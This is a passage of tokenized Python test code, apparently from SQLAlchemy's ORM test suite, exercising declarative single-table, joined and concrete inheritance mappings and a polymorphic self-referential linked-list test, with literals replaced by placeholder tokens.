<NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> def go ( ) : <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( '<STR_LIT>' , <EOL> String ( <NUM_LIT:50> ) ) <EOL> foo_bar = Column ( Integer , primary_key = True ) <EOL> assert_raises_message ( sa . exc . ArgumentError , <EOL> '<STR_LIT>' , go ) <EOL> def test_single_no_table_args ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> def go ( ) : <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( '<STR_LIT>' , <EOL> String ( <NUM_LIT:50> ) ) <EOL> __table_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> assert_raises_message ( sa . exc . ArgumentError , <EOL> '<STR_LIT>' , go ) <EOL> @ testing . emits_warning ( "<STR_LIT>" ) <EOL> def test_dupe_name_in_hierarchy ( self ) : <EOL> class A ( Base ) : <EOL> __tablename__ = "<STR_LIT:a>" <EOL> id = Column ( Integer , primary_key = True ) <EOL> a_1 = A <EOL> class A ( a_1 ) : <EOL> __tablename__ = '<STR_LIT:b>' <EOL> id = Column ( Integer ( ) , ForeignKey ( a_1 . id ) , primary_key = True ) <EOL> assert A . __mapper__ . inherits is a_1 . __mapper__ <EOL> class OverlapColPrecedenceTest ( DeclarativeTestBase ) : <EOL> """<STR_LIT>""" <EOL> def _run_test ( self , Engineer , e_id , p_id ) : <EOL> p_table = Base . metadata . tables [ '<STR_LIT>' ] <EOL> e_table = Base . metadata . tables [ '<STR_LIT>' ] <EOL> assert Engineer . id . property . columns [ <NUM_LIT:0> ] is e_table . c [ e_id ] <EOL> assert Engineer . id . property . columns [ <NUM_LIT:1> ] is p_table . c [ p_id ] <EOL> def test_basic ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> self . _run_test ( Engineer , "<STR_LIT:id>" , "<STR_LIT:id>" ) <EOL> def test_alt_name_base ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( "<STR_LIT>" , Integer , primary_key = True ) <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> self . _run_test ( Engineer , "<STR_LIT:id>" , "<STR_LIT>" ) <EOL> def test_alt_name_sub ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( "<STR_LIT>" , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> self . _run_test ( Engineer , "<STR_LIT>" , "<STR_LIT:id>" ) <EOL> def test_alt_name_both ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( "<STR_LIT>" , Integer , primary_key = True ) <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( "<STR_LIT>" , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> self . _run_test ( Engineer , "<STR_LIT>" , "<STR_LIT>" ) <EOL> from test . orm . test_events import _RemoveListeners <EOL> class ConcreteInhTest ( _RemoveListeners , DeclarativeTestBase ) : <EOL> def _roundtrip ( self , Employee , Manager , Engineer , Boss , <EOL> polymorphic = True , explicit_type = False ) : <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> e2 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> m1 = Manager ( name = '<STR_LIT>' , golf_swing = '<STR_LIT>' ) <EOL> e3 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> b1 = Boss ( name = "<STR_LIT>" ) <EOL> if polymorphic : <EOL> for obj in [ e1 , e2 , m1 , e3 , b1 ] : <EOL> if explicit_type : <EOL> eq_ ( obj . type , obj . __mapper__ . polymorphic_identity ) <EOL> else : <EOL> assert_raises_message ( <EOL> AttributeError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> getattr , obj , "<STR_LIT:type>" <EOL> ) <EOL> else : <EOL> assert "<STR_LIT:type>" not in Engineer . __dict__ <EOL> assert "<STR_LIT:type>" not in Manager . __dict__ <EOL> assert "<STR_LIT:type>" not in Boss . __dict__ <EOL> sess . add_all ( [ e1 , e2 , m1 , e3 , b1 ] ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> if polymorphic : <EOL> eq_ ( sess . query ( Employee ) . order_by ( Employee . name ) . all ( ) , <EOL> [ Engineer ( name = '<STR_LIT>' ) , Manager ( name = '<STR_LIT>' ) , <EOL> Boss ( name = '<STR_LIT>' ) , <EOL> Engineer ( name = '<STR_LIT>' ) , Engineer ( name = '<STR_LIT>' ) ] ) <EOL> else : <EOL> eq_ ( sess . query ( Engineer ) . order_by ( Engineer . name ) . all ( ) , <EOL> [ Engineer ( name = '<STR_LIT>' ) , Engineer ( name = '<STR_LIT>' ) , <EOL> Engineer ( name = '<STR_LIT>' ) ] ) <EOL> eq_ ( sess . query ( Manager ) . all ( ) , [ Manager ( name = '<STR_LIT>' ) ] ) <EOL> eq_ ( sess . query ( Boss ) . all ( ) , [ Boss ( name = '<STR_LIT>' ) ] ) <EOL> def test_explicit ( self ) : <EOL> engineers = Table ( <EOL> '<STR_LIT>' , Base . metadata , <EOL> Column ( '<STR_LIT:id>' , <EOL> Integer , primary_key = True , test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) ) <EOL> managers = Table ( '<STR_LIT>' , Base . metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> ) <EOL> boss = Table ( '<STR_LIT>' , Base . metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> ) <EOL> punion = polymorphic_union ( { <EOL> '<STR_LIT>' : engineers , <EOL> '<STR_LIT>' : managers , <EOL> '<STR_LIT>' : boss } , '<STR_LIT:type>' , '<STR_LIT>' ) <EOL> class Employee ( Base , fixtures . ComparableEntity ) : <EOL> __table__ = punion <EOL> __mapper_args__ = { '<STR_LIT>' : punion . c . type } <EOL> class Engineer ( Employee ) : <EOL> __table__ = engineers <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Manager ( Employee ) : <EOL> __table__ = managers <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Boss ( Manager ) : <EOL> __table__ = boss <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> self . _roundtrip ( Employee , Manager , Engineer , Boss ) <EOL> def test_concrete_inline_non_polymorphic ( self ) : <EOL> """<STR_LIT>""" <EOL> class Employee ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Engineer ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : True } <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Manager ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : True } <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Boss ( Manager ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : True } <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> self . _roundtrip ( Employee , Manager , Engineer , Boss , polymorphic = False ) <EOL> def test_abstract_concrete_extension ( self ) : <EOL> class Employee ( AbstractConcreteBase , Base , fixtures . ComparableEntity ) : <EOL> pass <EOL> class Manager ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Boss ( Manager ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Engineer ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> primary_language = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> self . _roundtrip ( Employee , Manager , Engineer , Boss ) <EOL> def test_concrete_extension ( self ) : <EOL> class Employee ( ConcreteBase , Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Manager ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Boss ( Manager ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Engineer ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> primary_language = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> self . _roundtrip ( Employee , Manager , Engineer , Boss ) <EOL> def test_has_inherited_table_doesnt_consider_base ( self ) : <EOL> class A ( Base ) : <EOL> __tablename__ = '<STR_LIT:a>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> assert not has_inherited_table ( A ) <EOL> class B ( A ) : <EOL> __tablename__ = '<STR_LIT:b>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> assert has_inherited_table ( B ) <EOL> def test_has_inherited_table_in_mapper_args ( self ) : <EOL> class Test ( Base ) : <EOL> __tablename__ = '<STR_LIT:test>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> type = Column ( String ( <NUM_LIT:20> ) ) <EOL> @ declared_attr <EOL> def __mapper_args__ ( cls ) : <EOL> if not has_inherited_table ( cls ) : <EOL> ret = { <EOL> '<STR_LIT>' : '<STR_LIT:default>' , <EOL> '<STR_LIT>' : cls . type , <EOL> } <EOL> else : <EOL> ret = { '<STR_LIT>' : cls . __name__ } <EOL> return ret <EOL> class PolyTest ( Test ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( Test . id ) , primary_key = True ) <EOL> configure_mappers ( ) <EOL> assert Test . __mapper__ . polymorphic_on is Test . __table__ . c . type <EOL> assert PolyTest . __mapper__ . polymorphic_on is Test . __table__ . c . type <EOL> def test_ok_to_override_type_from_abstract ( self ) : <EOL> class Employee ( AbstractConcreteBase , Base , fixtures . ComparableEntity ) : <EOL> pass <EOL> class Manager ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> @ property <EOL> def type ( self ) : <EOL> return "<STR_LIT>" <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : True } <EOL> class Boss ( Manager ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> @ property <EOL> def type ( self ) : <EOL> return "<STR_LIT>" <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : True } <EOL> class Engineer ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> primary_language = Column ( String ( <NUM_LIT> ) ) <EOL> @ property <EOL> def type ( self ) : <EOL> return "<STR_LIT>" <EOL> __mapper_args__ = { '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : True } <EOL> self . _roundtrip ( Employee , Manager , Engineer , Boss , explicit_type = True ) <EOL> class ConcreteExtensionConfigTest ( <EOL> _RemoveListeners , testing . AssertsCompiledSQL , DeclarativeTestBase ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> def test_classreg_setup ( self ) : <EOL> class A ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT:a>' <EOL> id = Column ( Integer , <EOL> primary_key = True , test_needs_autoincrement = True ) <EOL> data = Column ( String ( <NUM_LIT:50> ) ) <EOL> collection = relationship ( "<STR_LIT>" , primaryjoin = "<STR_LIT>" , <EOL> collection_class = set ) <EOL> class BC ( AbstractConcreteBase , Base , fixtures . ComparableEntity ) : <EOL> pass <EOL> class B ( BC ) : <EOL> __tablename__ = '<STR_LIT:b>' <EOL> id = Column ( Integer , <EOL> primary_key = True , test_needs_autoincrement = True ) <EOL> a_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> data = Column ( String ( <NUM_LIT:50> ) ) <EOL> b_data = Column ( String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { <EOL> "<STR_LIT>" : "<STR_LIT:b>" , <EOL> "<STR_LIT>" : True <EOL> } <EOL> class C ( BC ) : <EOL> __tablename__ = '<STR_LIT:c>' <EOL> id = Column ( Integer , <EOL> primary_key = True , test_needs_autoincrement = True ) <EOL> a_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> data = Column ( String ( <NUM_LIT:50> ) ) <EOL> c_data = Column ( String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { <EOL> "<STR_LIT>" : "<STR_LIT:c>" , <EOL> "<STR_LIT>" : True <EOL> } <EOL> Base . metadata . create_all ( ) <EOL> sess = Session ( ) <EOL> sess . add_all ( [ <EOL> A ( data = '<STR_LIT>' , collection = set ( [ <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> ] ) ) , <EOL> A ( data = '<STR_LIT>' , collection = set ( [ <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> ] ) ) <EOL> ] ) <EOL> sess . commit ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( <EOL> sess . query ( A ) . filter_by ( data = '<STR_LIT>' ) . all ( ) , <EOL> [ <EOL> A ( data = '<STR_LIT>' , collection = set ( [ <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> ] ) ) <EOL> ] <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( A ) . join ( A . collection ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_prop_on_base ( self ) : <EOL> """<STR_LIT>""" <EOL> counter = mock . Mock ( ) <EOL> class Something ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> class AbstractConcreteAbstraction ( AbstractConcreteBase , Base ) : <EOL> id = Column ( Integer , primary_key = True ) <EOL> x = Column ( Integer ) <EOL> y = Column ( Integer ) <EOL> @ declared_attr <EOL> def something_id ( cls ) : <EOL> return Column ( ForeignKey ( Something . id ) ) <EOL> @ declared_attr <EOL> def something ( cls ) : <EOL> counter ( cls , "<STR_LIT>" ) <EOL> return relationship ( "<STR_LIT>" ) <EOL> @ declared_attr <EOL> def something_else ( cls ) : <EOL> counter ( cls , "<STR_LIT>" ) <EOL> return relationship ( "<STR_LIT>" ) <EOL> class ConcreteConcreteAbstraction ( AbstractConcreteAbstraction ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> assert ConcreteConcreteAbstraction . __mapper__ <EOL> assert not hasattr ( AbstractConcreteAbstraction , '<STR_LIT>' ) <EOL> session = Session ( ) <EOL> self . assert_compile ( <EOL> session . query ( ConcreteConcreteAbstraction ) . filter ( <EOL> ConcreteConcreteAbstraction . something . has ( id = <NUM_LIT:1> ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> assert AbstractConcreteAbstraction . __mapper__ <EOL> self . assert_compile ( <EOL> session . query ( ConcreteConcreteAbstraction ) . filter ( <EOL> ConcreteConcreteAbstraction . something_else . has ( id = <NUM_LIT:1> ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> session . query ( AbstractConcreteAbstraction ) . filter ( <EOL> AbstractConcreteAbstraction . something . has ( id = <NUM_LIT:1> ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> session . query ( AbstractConcreteAbstraction ) . filter ( <EOL> AbstractConcreteAbstraction . something_else . has ( id = <NUM_LIT:1> ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_abstract_in_hierarchy ( self ) : <EOL> class Document ( Base , AbstractConcreteBase ) : <EOL> doctype = Column ( String ) <EOL> class ContactDocument ( Document ) : <EOL> __abstract__ = True <EOL> send_method = Column ( String ) <EOL> class ActualDocument ( ContactDocument ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( Integer , primary_key = True ) <EOL> configure_mappers ( ) <EOL> session = Session ( ) <EOL> self . assert_compile ( <EOL> session . query ( Document ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_column_attr_names ( self ) : <EOL> """<STR_LIT>""" <EOL> class Document ( Base , AbstractConcreteBase ) : <EOL> documentType = Column ( '<STR_LIT>' , String ) <EOL> class Offer ( Document ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> configure_mappers ( ) <EOL> session = Session ( ) <EOL> self . assert_compile ( <EOL> session . query ( Document ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> session . query ( Document . documentType ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) </s>
<s> from sqlalchemy import * <EOL> from sqlalchemy . orm import * <EOL> from sqlalchemy . testing import fixtures <EOL> from sqlalchemy import testing <EOL> from sqlalchemy . testing . schema import Table , Column <EOL> class PolymorphicCircularTest ( fixtures . MappedTest ) : <EOL> run_setup_mappers = '<STR_LIT>' <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> global Table1 , Table1B , Table2 , Table3 , Data <EOL> table1 = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True , test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) , nullable = True ) , <EOL> Column ( '<STR_LIT:type>' , String ( <NUM_LIT:30> ) ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:30> ) ) <EOL> ) <EOL> table2 = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> ) <EOL> table3 = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> ) <EOL> data = Table ( '<STR_LIT:data>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True , test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:data>' , String ( <NUM_LIT:30> ) ) <EOL> ) <EOL> join = table1 . outerjoin ( table2 ) . outerjoin ( table3 ) . alias ( '<STR_LIT>' ) <EOL> class Table1 ( object ) : <EOL> def __init__ ( self , name , data = None ) : <EOL> self . name = name <EOL> if data is not None : <EOL> self . data = data <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . id , repr ( str ( self . name ) ) , repr ( self . data ) ) <EOL> class Table1B ( Table1 ) : <EOL> pass <EOL> class Table2 ( Table1 ) : <EOL> pass <EOL> class Table3 ( Table1 ) : <EOL> pass <EOL> class Data ( object ) : <EOL> def __init__ ( self , data ) : <EOL> self . data = data <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . id , repr ( str ( self . data ) ) ) <EOL> try : <EOL> table1_mapper = mapper ( Table1 , table1 , <EOL> select_table = join , <EOL> polymorphic_on = table1 . c . type , <EOL> polymorphic_identity = '<STR_LIT>' , <EOL> properties = { <EOL> '<STR_LIT>' : relationship ( Table1 , <EOL> backref = backref ( '<STR_LIT>' , foreignkey = join . c . id , uselist = False ) , <EOL> uselist = False , primaryjoin = join . c . id == join . c . related_id ) , <EOL> '<STR_LIT:data>' : relationship ( mapper ( Data , data ) ) <EOL> } ) <EOL> configure_mappers ( ) <EOL> assert False <EOL> except : <EOL> assert True <EOL> clear_mappers ( ) <EOL> table1_mapper = mapper ( Table1 , table1 , <EOL> polymorphic_on = table1 . c . type , <EOL> polymorphic_identity = '<STR_LIT>' , <EOL> properties = { <EOL> '<STR_LIT>' : relationship ( Table1 , <EOL> backref = backref ( '<STR_LIT>' , remote_side = table1 . c . id , uselist = False ) , <EOL> uselist = False , primaryjoin = table1 . c . id == table1 . c . related_id ) , <EOL> '<STR_LIT:data>' : relationship ( mapper ( Data , data ) , lazy = '<STR_LIT>' , order_by = data . c . id ) <EOL> } <EOL> ) <EOL> table1b_mapper = mapper ( Table1B , inherits = table1_mapper , polymorphic_identity = '<STR_LIT>' ) <EOL> table2_mapper = mapper ( Table2 , table2 , <EOL> inherits = table1_mapper , <EOL> polymorphic_identity = '<STR_LIT>' ) <EOL> table3_mapper = mapper ( Table3 , table3 , inherits = table1_mapper , polymorphic_identity = '<STR_LIT>' ) <EOL> configure_mappers ( ) <EOL> assert table1_mapper . primary_key == ( table1 . c . id , ) , table1_mapper . primary_key <EOL> def test_one ( self ) : <EOL> self . _testlist ( [ Table1 , Table2 , Table1 , Table2 ] ) <EOL> def test_two ( self ) : <EOL> self . _testlist ( [ Table3 ] ) <EOL> def test_three ( self ) : <EOL> self . _testlist ( [ Table2 , Table1 , Table1B , Table3 , Table3 , Table1B , Table1B , Table2 , Table1 ] ) <EOL> def test_four ( self ) : <EOL> self . _testlist ( [ <EOL> Table2 ( '<STR_LIT>' , [ Data ( '<STR_LIT>' ) , Data ( '<STR_LIT>' ) ] ) , <EOL> Table1 ( '<STR_LIT>' , [ ] ) , <EOL> Table3 ( '<STR_LIT>' , [ Data ( '<STR_LIT>' ) ] ) , <EOL> Table1B ( '<STR_LIT>' , [ Data ( '<STR_LIT>' ) , Data ( '<STR_LIT>' ) ] ) <EOL> ] ) <EOL> def _testlist ( self , classes ) : <EOL> sess = create_session ( ) <EOL> count = <NUM_LIT:1> <EOL> obj = None <EOL> for c in classes : <EOL> if isinstance ( c , type ) : <EOL> newobj = c ( '<STR_LIT>' % count ) <EOL> count += <NUM_LIT:1> <EOL> else : <EOL> newobj = c <EOL> if obj is not None : <EOL> obj . nxt = newobj <EOL> else : <EOL> t = newobj <EOL> obj = newobj <EOL> sess . add ( t ) <EOL> sess . flush ( ) <EOL> assertlist = [ ] <EOL> node = t <EOL> while ( node ) : <EOL> assertlist . append ( node ) <EOL> n = node . nxt <EOL> if n is not None : <EOL> assert n . prev is node <EOL> node = n <EOL> original = repr ( assertlist ) <EOL> sess . expunge_all ( ) <EOL> node = sess . query ( Table1 ) . order_by ( Table1 . id ) . filter ( Table1 . id == t . id ) . first ( ) <EOL> assertlist = [ ] <EOL> while ( node ) : <EOL> assertlist . append ( node ) <EOL> n = node . nxt <EOL> if n is not None : <EOL> assert n . prev is node <EOL> node = n <EOL> forwards = repr ( assertlist ) <EOL> sess . expunge_all ( ) <EOL> node = sess . query ( Table1 ) . order_by ( Table1 . id ) . filter ( Table1 . id == obj . id ) . first ( ) <EOL> assertlist = [ ] <EOL> while ( node ) : <EOL> assertlist . insert ( <NUM_LIT:0> , node ) <EOL> n = node . prev <EOL> if n is not None : <EOL> assert n . nxt is node <EOL> node = n <EOL> backwards = repr ( assertlist ) <EOL> assert original == forwards == backwards </s>
